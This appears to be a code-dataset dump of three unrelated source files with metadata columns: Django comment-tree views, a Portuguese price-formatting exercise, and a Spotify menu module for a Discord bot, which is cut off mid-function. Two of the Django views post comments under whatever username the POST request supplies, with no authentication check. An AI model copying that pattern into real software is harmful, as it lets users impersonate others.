from django.contrib.auth.models import User
from .models import Post, Comment
from .forms import CommentForm
from .utils import create_comments_tree
def base_view(request):
comments = Post.objects.first().comments.all()
result = create_comments_tree(comments)
comment_form = CommentForm(request.POST or None)
return render(request, 'tree/base.html', {'comments': result, 'comment_form': comment_form})
def create_question(request):
comment_form = CommentForm(request.POST or None)
if comment_form.is_valid():
new_comment = comment_form.save(commit=False)
new_comment.user = request.user
new_comment.text = comment_form.cleaned_data['text']
new_comment.content_type = ContentType.objects.get(model='post')
new_comment.object_id = 5
new_comment.parent = None
new_comment.is_child = False
new_comment.is_answer = False
new_comment.save()
return HttpResponseRedirect('/add-data')
@transaction.atomic
def create_child_question(request):
user_name = request.POST.get('user')
current_id = request.POST.get('id')
text = request.POST.get('text')
user = User.objects.get(username=user_name)
content_type = ContentType.objects.get(model='post')
parent = Comment.objects.get(id=int(current_id))
is_child = False if not parent else True
comment_form = CommentForm(request.POST or None)
new_comment = comment_form.save(commit=False)
is_answer = False
Comment.objects.create(
user=user, text=text, content_type=content_type, object_id=1,
parent=parent, is_child=is_child, is_answer=is_answer
)
comments_ = Post.objects.first().comments.all()
comments_list = create_comments_tree(comments_)
return render(request, 'tree/base.html', {'comments': comments_list})
def create_answer(request):
comment_form = CommentForm(request.POST or None)
if comment_form.is_valid():
new_comment = comment_form.save(commit=False)
new_comment.user = request.user
new_comment.text = comment_form.cleaned_data['text']
new_comment.content_type = ContentType.objects.get(model='post')
new_comment.object_id = 5
new_comment.parent = None
new_comment.is_child = False
new_comment.is_answer = True
new_comment.save()
return HttpResponseRedirect('/add-data')
@transaction.atomic
def create_child_answer(request):
user_name = request.POST.get('user')
current_id = request.POST.get('id')
text = request.POST.get('text')
user = User.objects.get(username=user_name)
content_type = ContentType.objects.get(model='post')
parent = Comment.objects.get(id=int(current_id))
is_child = False if not parent else True
comment_form = CommentForm(request.POST or None)
new_comment = comment_form.save(commit=False)
is_answer = True
Comment.objects.create(
user=user, text=text, content_type=content_type, object_id=1,
parent=parent, is_child=is_child, is_answer=is_answer
)
comments_ = Post.objects.first().comments.all()
comments_list = create_comments_tree(comments_)
return render(request, 'tree/base.html', {'comments': comments_list})
| 40.452381
| 96
| 0.722778
| 452
| 3,398
| 5.216814
| 0.150442
| 0.084818
| 0.035623
| 0.061493
| 0.823155
| 0.823155
| 0.808312
| 0.775233
| 0.775233
| 0.775233
| 0
| 0.001423
| 0.172749
| 3,398
| 83
| 97
| 40.939759
| 0.837424
| 0
| 0
| 0.714286
| 0
| 0
| 0.041201
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064935
| false
| 0
| 0.103896
| 0
| 0.233766
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2c01ac454225c87b7269d1ee316960a50ad4ccc2
| 413
|
py
|
Python
|
Curso/ExMundo3/Ex108Modulos2Formatado.py
|
DavidBitner/Aprendizado-Python
|
e1dcf18f9473c697fc2302f34a2d3e025ca6c969
|
[
"MIT"
] | null | null | null |
Curso/ExMundo3/Ex108Modulos2Formatado.py
|
DavidBitner/Aprendizado-Python
|
e1dcf18f9473c697fc2302f34a2d3e025ca6c969
|
[
"MIT"
] | null | null | null |
Curso/ExMundo3/Ex108Modulos2Formatado.py
|
DavidBitner/Aprendizado-Python
|
e1dcf18f9473c697fc2302f34a2d3e025ca6c969
|
[
"MIT"
] | null | null | null |
from ExMundo3 import Ex108Modulo
p = float(input('Digite o preço: R$'))
print(f'A metade de {Ex108Modulo.moeda(p)} é {Ex108Modulo.moeda(Ex108Modulo.metade(p))}')
print(f'O dobro de {Ex108Modulo.moeda(p)} é {Ex108Modulo.moeda(Ex108Modulo.dobro(p))}')
print(f'Aumentando 15%, temos {Ex108Modulo.moeda(Ex108Modulo.aumentar(p, 15))}')
print(f'Diminuindo 20%, temos {Ex108Modulo.moeda(Ex108Modulo.diminuir(p, 20))}')
| 51.625
| 89
| 0.743341
| 61
| 413
| 5.032787
| 0.42623
| 0.312704
| 0.351792
| 0.123779
| 0.306189
| 0.306189
| 0.306189
| 0.306189
| 0
| 0
| 0
| 0.110526
| 0.079903
| 413
| 7
| 90
| 59
| 0.697368
| 0
| 0
| 0
| 0
| 0.333333
| 0.760291
| 0.510896
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.166667
| 0
| 0.166667
| 0.666667
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
25ec0d3b01e5c60f1755e3f745551e7ab85cd546
| 47,095
|
py
|
Python
|
spotify/menus.py
|
Thalamuszen/Trusty-cogs
|
83727ff6f625e8d8495313207844ea51a0026809
|
[
"MIT"
] | 1
|
2021-10-05T07:19:57.000Z
|
2021-10-05T07:19:57.000Z
|
spotify/menus.py
|
NeuroAssassin/Trusty-cogs
|
d4aef73d149a20c75a6809979c7ab4700b8d19a6
|
[
"MIT"
] | null | null | null |
spotify/menus.py
|
NeuroAssassin/Trusty-cogs
|
d4aef73d149a20c75a6809979c7ab4700b8d19a6
|
[
"MIT"
] | null | null | null |
from __future__ import annotations
import asyncio
import json
import logging
from copy import copy
from pathlib import Path
from typing import Any, List, Tuple
import discord
import tekore
from redbot.core import commands
from redbot.core.i18n import Translator
from redbot.core.utils.chat_formatting import box, humanize_list
from redbot.vendored.discord.ext import menus
from .helpers import (
REPEAT_STATES,
SPOTIFY_LOGO,
InvalidEmoji,
NotPlaying,
_draw_play,
make_details,
)
log = logging.getLogger("red.Trusty-cogs.spotify")
_ = Translator("Spotify", __file__)
class EmojiHandler:
def __init__(self):
with open(Path(__file__).parent / "emojis.json", "r") as infile:
self.emojis = json.loads(infile.read())
self.default = copy(self.emojis)
def get_emoji(self, name: str) -> str:
if name in self.emojis:
return self.emojis[name]
return self.default[name]
# we shouldn't have anyone deleting emoji keys
def reload_emojis(self):
# we could just copy default but we can also just
# reload the emojis from disk
with open(Path(__file__).parent / "emojis.json", "r") as infile:
self.emojis = json.loads(infile.read())
def replace_emoji(self, name: str, to: str):
if name not in self.emojis:
raise InvalidEmoji
self.emojis[name] = to
emoji_handler = EmojiHandler() # initialize here so when it's changed other objects use this one
class SpotifyTrackPages(menus.ListPageSource):
def __init__(self, items: List[tekore.model.FullTrack], detailed: bool):
super().__init__(items, per_page=1)
self.current_track = None
self.detailed = detailed
def is_paginating(self):
return True
async def format_page(
self, menu: menus.MenuPages, track: tekore.model.FullTrack
) -> discord.Embed:
self.current_track = track
em = discord.Embed(color=discord.Colour(0x1DB954))
url = f"https://open.spotify.com/track/{track.id}"
artist_title = f"{track.name} by " + ", ".join(a.name for a in track.artists)
em.set_author(
name=track.name[:256],
url=url,
icon_url=SPOTIFY_LOGO,
)
em.description = f"[{artist_title}]({url})\n"
if track.album.images:
em.set_thumbnail(url=track.album.images[0].url)
if self.detailed:
sp = tekore.Spotify(sender=menu.cog._sender)
with sp.token_as(menu.user_token):
details = await sp.track_audio_features(track.id)
msg = await make_details(track, details)
em.add_field(name="Details", value=box(msg[:1000], lang="css"))
em.set_footer(
text=_("Page") + f" {menu.current_page + 1}/{self.get_max_pages()}",
)
return em
class SpotifyArtistPages(menus.ListPageSource):
def __init__(self, items: List[tekore.model.FullArtist], detailed: bool):
super().__init__(items, per_page=1)
self.current_track = None
def is_paginating(self):
return True
async def format_page(
self, menu: menus.MenuPages, artist: tekore.model.FullArtist
) -> discord.Embed:
self.current_track = artist
em = discord.Embed(color=discord.Colour(0x1DB954))
url = f"https://open.spotify.com/artist/{artist.id}"
artist_title = f"{artist.name}"
em.set_author(
name=artist_title,
url=url,
icon_url=SPOTIFY_LOGO,
)
sp = tekore.Spotify(sender=menu.cog._sender)
with sp.token_as(menu.user_token):
cur = await sp.artist_top_tracks(artist.id, "from_token")
msg = _("Top Tracks\n")
for track in cur:
msg += f"[{track.name}](https://open.spotify.com/track/{track.id})\n"
em.description = msg
if artist.images:
em.set_thumbnail(url=artist.images[0].url)
em.set_footer(
text=_("Page") + f" {menu.current_page + 1}/{self.get_max_pages()}",
)
return em
class SpotifyAlbumPages(menus.ListPageSource):
def __init__(self, items: List[tekore.model.FullAlbum], detailed: bool):
super().__init__(items, per_page=1)
self.current_track = None
def is_paginating(self):
return True
async def format_page(
self, menu: menus.MenuPages, album: tekore.model.FullAlbum
) -> discord.Embed:
self.current_track = album
em = discord.Embed(color=discord.Colour(0x1DB954))
url = f"https://open.spotify.com/album/{album.id}"
title = f"{album.name} by {humanize_list([a.name for a in album.artists])}"
if len(title) > 256:
title = title[:253] + "..."
em.set_author(
name=title,
url=url,
icon_url=SPOTIFY_LOGO,
)
msg = "Tracks:\n"
sp = tekore.Spotify(sender=menu.cog._sender)
with sp.token_as(menu.user_token):
cur = await sp.album(album.id)
for track in cur.tracks.items:
msg += f"[{track.name}](https://open.spotify.com/track/{track.id})\n"
em.description = msg
if album.images:
em.set_thumbnail(url=album.images[0].url)
em.set_footer(
text=_("Page") + f" {menu.current_page + 1}/{self.get_max_pages()}",
)
return em
class SpotifyPlaylistPages(menus.ListPageSource):
def __init__(self, items: List[tekore.model.SimplePlaylist], detailed: bool):
super().__init__(items, per_page=1)
self.current_track = None
def is_paginating(self):
return True
async def format_page(
self, menu: menus.MenuPages, playlist: tekore.model.SimplePlaylist
) -> discord.Embed:
self.current_track = playlist
em = None
em = discord.Embed(color=discord.Colour(0x1DB954))
url = f"https://open.spotify.com/playlist/{playlist.id}"
artists = getattr(playlist, "artists", [])
artist = humanize_list([a.name for a in artists])[:256]
em.set_author(
name=artist or playlist.name,
url=url,
icon_url=SPOTIFY_LOGO,
)
user_spotify = tekore.Spotify(sender=menu.cog._sender)
description = ""
with user_spotify.token_as(menu.user_token):
cur = await user_spotify.playlist_items(playlist.id)
for track in cur.items[:10]:
description += (
f"[{track.track.name}](https://open.spotify.com/track/{track.track.id})\n"
)
em.description = description
if playlist.images:
em.set_thumbnail(url=playlist.images[0].url)
em.set_footer(
text=_("Page") + f" {menu.current_page + 1}/{self.get_max_pages()}",
)
return em
class SpotifyNewPages(menus.ListPageSource):
def __init__(self, items: List[tekore.model.SimplePlaylist]):
super().__init__(items, per_page=1)
self.current_track = None
def is_paginating(self):
return True
async def format_page(
self, menu: menus.MenuPages, playlist: tekore.model.SimplePlaylist
) -> discord.Embed:
self.current_track = playlist
em = None
em = discord.Embed(color=discord.Colour(0x1DB954))
url = f"https://open.spotify.com/playlist/{playlist.id}"
artists = getattr(playlist, "artists", [])
artist = humanize_list([a.name for a in artists])[:256]
em.set_author(
name=artist or playlist.name,
url=url,
icon_url=SPOTIFY_LOGO,
)
user_spotify = tekore.Spotify(sender=menu.cog._sender)
description = ""
with user_spotify.token_as(menu.user_token):
if playlist.type == "playlist":
cur = await user_spotify.playlist_items(playlist.id)
for track in cur.items[:10]:
description += f"[{track.track.name}](https://open.spotify.com/playlist/{track.track.id})\n"
if playlist.type == "album":
album = await user_spotify.album(playlist.id)
cur = album.tracks
for track in cur.items[:10]:
description += f"[{track.name}](https://open.spotify.com/album/{track.id})\n"
em.description = description
if playlist.images:
em.set_thumbnail(url=playlist.images[0].url)
em.set_footer(
text=_("Page") + f" {menu.current_page + 1}/{self.get_max_pages()}",
)
return em
class SpotifyEpisodePages(menus.ListPageSource):
def __init__(self, items: List[tekore.model.FullEpisode], detailed: bool):
super().__init__(items, per_page=1)
self.current_track = None
self.detailed = detailed
def is_paginating(self):
return True
async def format_page(
self, menu: menus.MenuPages, episode: tekore.model.FullEpisode
) -> discord.Embed:
self.current_track = episode
show = episode.show
em = discord.Embed(color=discord.Colour(0x1DB954))
url = f"https://open.spotify.com/episode/{episode.id}"
artist_title = f"{show.name} by {show.publisher}"
em.set_author(
name=artist_title[:256],
url=url,
icon_url=SPOTIFY_LOGO,
)
em.description = f"[{episode.description[:1900]}]({url})\n"
if episode.images:
em.set_thumbnail(url=episode.images[0].url)
em.set_footer(
text=_("Page") + f" {menu.current_page + 1}/{self.get_max_pages()}",
)
return em
class SpotifyShowPages(menus.ListPageSource):
def __init__(self, items: List[tekore.model.FullShow], detailed: bool):
super().__init__(items, per_page=1)
self.current_track = None
self.detailed = detailed
def is_paginating(self):
return True
async def format_page(
self, menu: menus.MenuPages, show: tekore.model.FullShow
) -> discord.Embed:
self.current_track = show
em = discord.Embed(color=discord.Colour(0x1DB954))
url = f"https://open.spotify.com/show/{show.id}"
artist_title = f"{show.name} by {show.publisher}"
em.set_author(
name=artist_title[:256],
url=url,
icon_url=SPOTIFY_LOGO,
)
em.description = f"[{show.description[:1900]}]({url})\n"
if show.images:
em.set_thumbnail(url=show.images[0].url)
em.set_footer(
text=_("Page") + f" {menu.current_page + 1}/{self.get_max_pages()}",
)
return em
class SpotifyRecentSongPages(menus.ListPageSource):
def __init__(self, tracks: List[tekore.model.PlayHistory], detailed: bool):
super().__init__(tracks, per_page=1)
self.current_track = None
self.detailed = detailed
def is_paginating(self):
return True
async def format_page(
self, menu: menus.MenuPages, history: tekore.model.PlayHistory
) -> discord.Embed:
track = history.track
self.current_track = track
em = None
em = discord.Embed(color=discord.Colour(0x1DB954), timestamp=history.played_at)
url = f"https://open.spotify.com/track/{track.id}"
artist_title = f"{track.name} by " + ", ".join(a.name for a in track.artists)
em.set_author(
name=track.name[:256],
url=url,
icon_url=SPOTIFY_LOGO,
)
em.description = f"[{artist_title}]({url})\n"
if track.album.images:
em.set_thumbnail(url=track.album.images[0].url)
if self.detailed:
sp = tekore.Spotify(sender=menu.cog._sender)
with sp.token_as(menu.user_token):
details = await sp.track_audio_features(history.track.id)
msg = await make_details(track, details)
em.add_field(name="Details", value=box(msg[:1000], lang="css"))
em.set_footer(
text=f"Page {menu.current_page + 1}/{self.get_max_pages()} | Played at",
)
return em
class SpotifyPlaylistsPages(menus.ListPageSource):
def __init__(self, playlists: List[tekore.model.SimplePlaylist]):
super().__init__(playlists, per_page=10)
async def format_page(
self, menu: menus.MenuPages, playlists: List[tekore.model.SimplePlaylist]
) -> discord.Embed:
em = None
em = discord.Embed(color=discord.Colour(0x1DB954))
em.set_author(
name=f"{menu.ctx.author.display_name}" + _("'s Spotify Playlists"),
icon_url=menu.ctx.author.avatar_url,
)
msg = ""
for playlist in playlists:
if playlist.public:
msg += f"[{playlist.name}](https://open.spotify.com/playlist/{playlist.id})\n"
else:
msg += f"{playlist.name}\n"
em.description = msg
em.set_footer(
text=_("Page") + f" {menu.current_page + 1}/{self.get_max_pages()}",
icon_url=SPOTIFY_LOGO,
)
return em
class SpotifyTopTracksPages(menus.ListPageSource):
def __init__(self, playlists: List[tekore.model.FullTrack]):
super().__init__(playlists, per_page=10)
async def format_page(
self, menu: menus.MenuPages, tracks: List[tekore.model.FullTrack]
) -> discord.Embed:
em = None
em = discord.Embed(color=discord.Colour(0x1DB954))
em.set_author(
name=f"{menu.ctx.author.display_name}" + _("'s Top Tracks"),
icon_url=menu.ctx.author.avatar_url,
)
msg = ""
for track in tracks:
artist = humanize_list([a.name for a in track.artists])
msg += f"[{track.name} by {artist}](https://open.spotify.com/track/{track.id})\n"
em.description = msg
em.set_footer(
text=_("Page") + f" {menu.current_page + 1}/{self.get_max_pages()}",
icon_url=SPOTIFY_LOGO,
)
return em
class SpotifyTopArtistsPages(menus.ListPageSource):
def __init__(self, playlists: List[tekore.model.FullArtist]):
super().__init__(playlists, per_page=10)
async def format_page(
self, menu: menus.MenuPages, artists: List[tekore.model.FullArtist]
) -> discord.Embed:
em = None
em = discord.Embed(color=discord.Colour(0x1DB954))
em.set_author(
name=f"{menu.ctx.author.display_name}" + _("'s Top Artists"),
icon_url=menu.ctx.author.avatar_url,
)
msg = ""
for artist in artists:
msg += f"[{artist.name}](https://open.spotify.com/artist/{artist.id})\n"
em.description = msg
em.set_footer(
text=_("Page") + f" {menu.current_page + 1}/{self.get_max_pages()}",
icon_url=SPOTIFY_LOGO,
)
return em
class SpotifyPages(menus.PageSource):
def __init__(self, user_token: tekore.Token, sender: tekore.AsyncSender, detailed: bool):
super().__init__()
self.user_token = user_token
self.sender = sender
self.detailed = detailed
self.current_track = None
async def format_page(
self,
menu: menus.MenuPages,
cur_state: Tuple[tekore.model.CurrentlyPlayingContext, bool],
) -> discord.Embed:
state = cur_state[0]
is_liked = cur_state[1]
em = discord.Embed(color=discord.Colour(0x1DB954))
self.current_track = state.item
if state.item.is_local:
url = "https://open.spotify.com/"
artist_title = f"{state.item.name} by " + ", ".join(a.name for a in state.item.artists)
image = SPOTIFY_LOGO
elif state.item.type == "episode":
url = f"https://open.spotify.com/episode/{state.item.id}"
artist_title = state.item.name
image = state.item.images[0].url
else:
url = f"https://open.spotify.com/track/{state.item.id}"
artist_title = f"{state.item.name} by " + ", ".join(a.name for a in state.item.artists)
image = state.item.album.images[0].url
album = getattr(state.item, "album", "")
if album:
album = f"[{album.name}](https://open.spotify.com/album/{album.id})"
em.set_author(
name=f"{menu.ctx.author.display_name}" + _(" is currently listening to"),
icon_url=menu.ctx.author.avatar_url,
url=url,
)
repeat = (
f"Repeat: {REPEAT_STATES[state.repeat_state]} |" if state.repeat_state != "off" else ""
)
shuffle = "Shuffle: \N{TWISTED RIGHTWARDS ARROWS} |" if state.shuffle_state else ""
liked = "Liked: \N{HEAVY BLACK HEART}\N{VARIATION SELECTOR-16}" if is_liked else ""
footer = f"{repeat}{shuffle}{liked}"
em.set_footer(text=footer, icon_url=SPOTIFY_LOGO)
em.description = f"[{artist_title}]({url})\n\n{album}\n{_draw_play(state)}"
try:
if self.detailed and not state.item.is_local:
sp = tekore.Spotify(sender=self.sender)
with sp.token_as(self.user_token):
details = await sp.track_audio_features(state.item.id)
msg = await make_details(state.item, details)
em.add_field(name="Details", value=box(msg[:1000], lang="css"))
except tekore.NotFound:
pass
em.set_thumbnail(url=image)
return em
def is_paginating(self):
"""An abstract method that notifies the :class:`MenuPages` whether or not
to start paginating. This signals whether to add reactions or not.
Subclasses must implement this.
Returns
--------
:class:`bool`
Whether to trigger pagination.
"""
return True
def get_max_pages(self):
"""An optional abstract method that retrieves the maximum number of pages
this page source has. Useful for UX purposes.
The default implementation returns ``None``.
Returns
--------
Optional[:class:`int`]
The maximum number of pages required to properly
paginate the elements, if given.
"""
return None
async def get_page(self, page_number):
"""|coro|
An abstract method that retrieves an object representing the object to format.
Subclasses must implement this.
.. note::
The page_number is zero-indexed between [0, :meth:`get_max_pages`),
if there is a maximum number of pages.
Parameters
-----------
page_number: :class:`int`
The page number to access.
Returns
---------
Any
The object represented by that page.
This is passed into :meth:`format_page`.
"""
try:
user_spotify = tekore.Spotify(sender=self.sender)
with user_spotify.token_as(self.user_token):
cur_state = await user_spotify.playback()
if not cur_state:
raise NotPlaying
is_liked = False
if not cur_state.item.is_local:
song = cur_state.item.id
liked = await user_spotify.saved_tracks_contains([song])
is_liked = liked[0]
except tekore.Unauthorised:
raise
return cur_state, is_liked
class SpotifyUserMenu(menus.MenuPages, inherit_buttons=False):
def __init__(
self,
source: menus.PageSource,
cog: commands.Cog,
user_token: tekore.Token,
clear_reactions_after: bool = True,
delete_message_after: bool = False,
timeout: int = 60,
message: discord.Message = None,
**kwargs: Any,
) -> None:
super().__init__(
source,
clear_reactions_after=clear_reactions_after,
delete_message_after=delete_message_after,
timeout=timeout,
message=message,
**kwargs,
)
self.user_token = user_token
self.cog = cog
self.add_button(
menus.Button(emoji_handler.get_emoji("next"), self.skip_next, position=menus.First(2))
)
self.add_button(
menus.Button(
emoji_handler.get_emoji("previous"), self.skip_previous, position=menus.First(0)
)
)
self.add_button(
menus.Button(
emoji_handler.get_emoji("playpause"), self.play_pause, position=menus.First(1)
)
)
self.add_button(
menus.Button(emoji_handler.get_emoji("repeat"), self.repeat, position=menus.First(3))
)
self.add_button(
menus.Button(emoji_handler.get_emoji("shuffle"), self.shuffle, position=menus.First(4))
)
self.add_button(
menus.Button(emoji_handler.get_emoji("like"), self.like_song, position=menus.First(5))
)
async def update(self, payload):
"""|coro|
Updates the menu after an event has been received.
Parameters
-----------
payload: :class:`discord.RawReactionActionEvent`
The reaction event that triggered this update.
"""
button = self.buttons[payload.emoji]
if not self._running:
return
try:
if button.lock:
async with self._lock:
if self._running:
await button(self, payload)
else:
await button(self, payload)
except Exception as exc:
log.debug("Ignored exception on reaction event", exc_info=exc)
async def send_initial_message(self, ctx, channel):
"""|coro|
The default implementation of :meth:`Menu.send_initial_message`
for the interactive pagination session.
This implementation shows the first page of the source.
"""
page = await self._source.get_page(0)
kwargs = await self._get_kwargs_from_page(page)
msg = await channel.send(**kwargs)
self.cog.current_menus[msg.id] = ctx.author.id
return msg
async def show_page(self, page_number):
page = await self._source.get_page(page_number)
self.current_page = page_number
kwargs = await self._get_kwargs_from_page(page)
await self.message.edit(**kwargs)
async def show_checked_page(self, page_number: int) -> None:
max_pages = self._source.get_max_pages()
try:
if max_pages is None:
# If it doesn't give maximum pages, it cannot be checked
await self.show_page(page_number)
elif page_number >= max_pages:
await self.show_page(0)
elif page_number < 0:
await self.show_page(max_pages - 1)
elif max_pages > page_number >= 0:
await self.show_page(page_number)
except IndexError:
# An error happened that can be handled, so ignore it.
pass
def reaction_check(self, payload):
"""Just extends the default reaction_check to use owner_ids"""
if payload.message_id != self.message.id:
return False
if payload.user_id != self._author_id:
return False
return payload.emoji in self.buttons
def _skip_single_arrows(self):
max_pages = self._source.get_max_pages()
if max_pages is None:
return True
return max_pages == 1
def _skip_double_triangle_buttons(self):
max_pages = self._source.get_max_pages()
if max_pages is None:
return True
return max_pages <= 2
async def play_pause(self, payload):
"""go to the previous page"""
try:
user_spotify = tekore.Spotify(sender=self.cog._sender)
with user_spotify.token_as(self.user_token):
cur = await user_spotify.playback()
if not cur:
await self.ctx.send(
_("I could not find an active device to send requests for.")
)
if cur.is_playing:
await user_spotify.playback_pause()
else:
await user_spotify.playback_resume()
except tekore.Unauthorised:
await self.ctx.send(_("I am not authorized to perform this action for you."))
except tekore.NotFound:
await self.ctx.send(_("I could not find an active device to send requests for."))
except tekore.Forbidden as e:
if "non-premium" in str(e):
await self.ctx.send(_("This action is prohibited for non-premium users."))
else:
await self.ctx.send(_("I couldn't perform that action for you."))
except tekore.HTTPError:
log.exception("Error grabing user info from spotify")
await self.ctx.send(
_("An exception has occured, please contact the bot owner for more assistance.")
)
await asyncio.sleep(1)
await self.show_checked_page(0)
async def repeat(self, payload):
"""go to the next page"""
try:
user_spotify = tekore.Spotify(sender=self.cog._sender)
with user_spotify.token_as(self.user_token):
cur = await user_spotify.playback()
if cur.repeat_state == "off":
state = "context"
if cur.repeat_state == "context":
state = "track"
if cur.repeat_state == "track":
state = "off"
await user_spotify.playback_repeat(state)
except tekore.Unauthorised:
await self.ctx.send(_("I am not authorized to perform this action for you."))
except tekore.NotFound:
await self.ctx.send(_("I could not find an active device to send requests for."))
except tekore.Forbidden as e:
if "non-premium" in str(e):
await self.ctx.send(_("This action is prohibited for non-premium users."))
else:
await self.ctx.send(_("I couldn't perform that action for you."))
except tekore.HTTPError:
log.exception("Error grabing user info from spotify")
await self.ctx.send(
_("An exception has occured, please contact the bot owner for more assistance.")
)
await asyncio.sleep(1)
await self.show_checked_page(0)
async def shuffle(self, payload):
"""go to the next page"""
try:
user_spotify = tekore.Spotify(sender=self.cog._sender)
with user_spotify.token_as(self.user_token):
cur = await user_spotify.playback()
if not cur:
await self.ctx.send(
_("I could not find an active device to send requests for.")
)
state = not cur.shuffle_state
await user_spotify.playback_shuffle(state)
except tekore.Unauthorised:
await self.ctx.send(_("I am not authorized to perform this action for you."))
except tekore.NotFound:
await self.ctx.send(_("I could not find an active device to send requests for."))
except tekore.Forbidden as e:
if "non-premium" in str(e):
await self.ctx.send(_("This action is prohibited for non-premium users."))
else:
await self.ctx.send(_("I couldn't perform that action for you."))
except tekore.HTTPError:
log.exception("Error grabing user info from spotify")
await self.ctx.send(
_("An exception has occured, please contact the bot owner for more assistance.")
)
await asyncio.sleep(1)
await self.show_checked_page(0)
async def like_song(self, payload):
"""go to the next page"""
try:
user_spotify = tekore.Spotify(sender=self.cog._sender)
with user_spotify.token_as(self.user_token):
cur = await user_spotify.playback()
if not cur:
await self.ctx.send(
_("I could not find an active device to send requests for.")
)
await user_spotify.saved_tracks_add([self.source.current_track.id])
except tekore.Unauthorised:
await self.ctx.send(_("I am not authorized to perform this action for you."))
except tekore.NotFound:
await self.ctx.send(_("I could not find an active device to send requests for."))
except tekore.Forbidden as e:
if "non-premium" in str(e):
await self.ctx.send(_("This action is prohibited for non-premium users."))
else:
await self.ctx.send(_("I couldn't perform that action for you."))
except tekore.HTTPError:
log.exception("Error grabing user info from spotify")
await self.ctx.send(
_("An exception has occured, please contact the bot owner for more assistance.")
)
await self.show_checked_page(0)
async def skip_previous(self, payload):
"""go to the first page"""
try:
user_spotify = tekore.Spotify(sender=self.cog._sender)
with user_spotify.token_as(self.user_token):
await user_spotify.playback_previous()
except tekore.Unauthorised:
await self.ctx.send(_("I am not authorized to perform this action for you."))
except tekore.NotFound:
await self.ctx.send(_("I could not find an active device to send requests for."))
except tekore.Forbidden as e:
if "non-premium" in str(e):
await self.ctx.send(_("This action is prohibited for non-premium users."))
else:
await self.ctx.send(_("I couldn't perform that action for you."))
except tekore.HTTPError:
log.exception("Error grabing user info from spotify")
await self.ctx.send(
_("An exception has occured, please contact the bot owner for more assistance.")
)
await asyncio.sleep(1)
await self.show_page(0)
async def skip_next(self, payload):
"""go to the last page"""
try:
user_spotify = tekore.Spotify(sender=self.cog._sender)
with user_spotify.token_as(self.user_token):
await user_spotify.playback_next()
except tekore.Unauthorised:
await self.ctx.send(_("I am not authorized to perform this action for you."))
except tekore.NotFound:
await self.ctx.send(_("I could not find an active device to send requests for."))
except tekore.Forbidden as e:
if "non-premium" in str(e):
await self.ctx.send(_("This action is prohibited for non-premium users."))
else:
await self.ctx.send(_("I couldn't perform that action for you."))
except tekore.HTTPError:
log.exception("Error grabing user info from spotify")
await self.ctx.send(
_("An exception has occured, please contact the bot owner for more assistance.")
)
await asyncio.sleep(1)
await self.show_page(0)
@menus.button("\N{CROSS MARK}")
async def stop_pages(self, payload: discord.RawReactionActionEvent) -> None:
"""stops the pagination session."""
self.stop()
del self.cog.current_menus[self.message.id]
await self.message.delete()
class SpotifySearchMenu(menus.MenuPages, inherit_buttons=False):
def __init__(
self,
source: menus.PageSource,
cog: commands.Cog,
user_token: tekore.Token,
clear_reactions_after: bool = True,
delete_message_after: bool = False,
timeout: int = 60,
message: discord.Message = None,
**kwargs: Any,
) -> None:
super().__init__(
source,
clear_reactions_after=clear_reactions_after,
delete_message_after=delete_message_after,
timeout=timeout,
message=message,
**kwargs,
)
self.user_token = user_token
self.cog = cog
self.add_button(
menus.Button(emoji_handler.get_emoji("next"), self.skip_next, position=menus.First(6))
)
self.add_button(
menus.Button(
emoji_handler.get_emoji("previous"), self.skip_previous, position=menus.First(0)
)
)
self.add_button(
menus.Button(
emoji_handler.get_emoji("playpause"), self.play_pause, position=menus.First(2)
)
)
self.add_button(
menus.Button(
emoji_handler.get_emoji("playall"),
self.play_pause_all,
position=menus.First(3),
skip_if=self._skip_play_all,
)
)
self.add_button(
menus.Button(emoji_handler.get_emoji("like"), self.like_song, position=menus.First(4))
)
self.add_button(
menus.Button(
emoji_handler.get_emoji("back_left"),
self.go_to_previous_page,
position=menus.First(1),
)
)
self.add_button(
menus.Button(
emoji_handler.get_emoji("play"), self.go_to_next_page, position=menus.First(5)
)
)
async def update(self, payload):
"""|coro|
Updates the menu after an event has been received.
Parameters
-----------
payload: :class:`discord.RawReactionActionEvent`
The reaction event that triggered this update.
"""
button = self.buttons[payload.emoji]
if not self._running:
return
try:
if button.lock:
async with self._lock:
if self._running:
await button(self, payload)
else:
await button(self, payload)
except Exception as exc:
log.debug("Ignored exception on reaction event", exc_info=exc)
async def send_initial_message(self, ctx, channel):
"""|coro|
The default implementation of :meth:`Menu.send_initial_message`
for the interactive pagination session.
This implementation shows the first page of the source.
"""
page = await self._source.get_page(0)
kwargs = await self._get_kwargs_from_page(page)
msg = await channel.send(**kwargs)
self.cog.current_menus[msg.id] = ctx.author.id
return msg
async def show_page(self, page_number):
page = await self._source.get_page(page_number)
self.current_page = page_number
kwargs = await self._get_kwargs_from_page(page)
await self.message.edit(**kwargs)
async def show_checked_page(self, page_number: int) -> None:
max_pages = self._source.get_max_pages()
try:
if max_pages is None:
# If it doesn't give maximum pages, it cannot be checked
await self.show_page(page_number)
elif page_number >= max_pages:
await self.show_page(0)
elif page_number < 0:
await self.show_page(max_pages - 1)
elif max_pages > page_number >= 0:
await self.show_page(page_number)
except IndexError:
# An error happened that can be handled, so ignore it.
pass
def reaction_check(self, payload):
"""Just extends the default reaction_check to use owner_ids"""
if payload.message_id != self.message.id:
return False
if payload.user_id != self._author_id:
return False
return payload.emoji in self.buttons
def _skip_single_arrows(self):
max_pages = self._source.get_max_pages()
if max_pages is None:
return True
return max_pages == 1
def _skip_double_triangle_buttons(self):
max_pages = self._source.get_max_pages()
if max_pages is None:
return True
return max_pages <= 2
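# the "play all" button is only meaningful when the results are individual tracks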
def _skip_play_all(self):
if isinstance(self._source.entries[0], tekore.model.FullTrack):
return False
return True
async def go_to_previous_page(self, payload):
"""go to the previous page"""
await self.show_checked_page(self.current_page - 1)
async def go_to_next_page(self, payload):
